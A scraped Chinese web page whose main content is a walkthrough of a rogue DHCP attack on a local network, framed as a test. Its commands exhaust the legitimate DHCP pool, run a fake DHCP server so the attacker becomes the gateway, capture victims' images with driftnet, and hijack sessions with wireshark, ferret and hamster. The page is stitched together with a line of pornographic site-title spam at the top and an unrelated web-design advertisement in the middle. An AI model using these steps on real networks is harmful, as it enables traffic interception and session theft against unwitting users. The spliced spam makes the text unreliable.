日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
流氓DHCP服務(wù)器內(nèi)網(wǎng)攻擊測試

通常內(nèi)網(wǎng)滲透都是基于ARP的攻擊,但ARP攻擊對內(nèi)網(wǎng)的負擔(dān)太重,很容易被發(fā)現(xiàn)。今天講的是基于DHCP協(xié)議的攻擊。

在網(wǎng)站建設(shè)、做網(wǎng)站過程中,需要針對客戶的行業(yè)特點、產(chǎn)品特性、目標受眾和市場情況進行定位分析,以確定網(wǎng)站的風(fēng)格、色彩、版式、交互等方面的設(shè)計方向。成都創(chuàng)新互聯(lián)公司還需要根據(jù)客戶的需求進行功能模塊的開發(fā)和設(shè)計,包括內(nèi)容管理、前臺展示、用戶權(quán)限管理、數(shù)據(jù)統(tǒng)計和安全保護等功能。

基于DHCP的攻擊理解起來很簡單,首先偽造Mac地址耗竭正常的DHCP服務(wù)器的IP地址,然后黑客用自己的主機偽造一個DHCP服務(wù)器,那么新連上內(nèi)網(wǎng)的主機只能使用流氓DHCP服務(wù)器分配的IP,這樣黑客的主機就變成了內(nèi)網(wǎng)網(wǎng)關(guān),可以借此控制內(nèi)網(wǎng)中其他主機的網(wǎng)絡(luò)流量。

攻擊環(huán)境

操作系統(tǒng):Kali linux

網(wǎng)關(guān): 192.168.177.1

IP地址: 192.168.177.128

網(wǎng)段:192.168.177.1/24

0×01 開啟操作系統(tǒng)的路由轉(zhuǎn)發(fā)

echo "1" >/proc/sys/net/ipv4/ip_forward

0×02 攻擊正常的dhcp服務(wù)器,耗光ip資源

dhcpstarv -i eth0 -e 192.168.177.128

Kali默認沒有安裝dhcpstarv,也可以用yersinia代替

0×03 安裝dhcp服務(wù)器udhcpd

# apt-get install udhcpd

然后修改一下配置文件

# vim /etc/udhcpd.conf

0×04 啟動DHCP服務(wù)器

service udhcpd start

然后啟動另一臺Kali機當作目標靶機,由于正常的DHCP服務(wù)器已經(jīng)沒有可分配的IP資源,新的內(nèi)網(wǎng)主機就會使用攻擊者DHCP服務(wù)器分配的IP

0×05 抓取目標靶機的圖片

在攻擊主機上開啟driftnet

# driftnet -i eth0

在目標靶機打開百度圖片

在攻擊者的服務(wù)器上就可以看到圖像

0×06 會話劫持

開啟wireshark抓取流經(jīng)本地網(wǎng)卡的數(shù)據(jù)包,由于其他的機器走的是攻擊者主機的網(wǎng)卡,這也意味著wireshark可以抓取其他主機的數(shù)據(jù)包

用ferret解析一下

# ferret -r demo.pcap

會在本地生成一個名為hamster.txt的文件

然后運行harmter,這會在主機開啟1234端口

配置一下火狐代理

劫持成功


分享標題:流氓DHCP服務(wù)器內(nèi)網(wǎng)攻擊測試
文章分享:http://m.5511xx.com/article/cohhpsd.html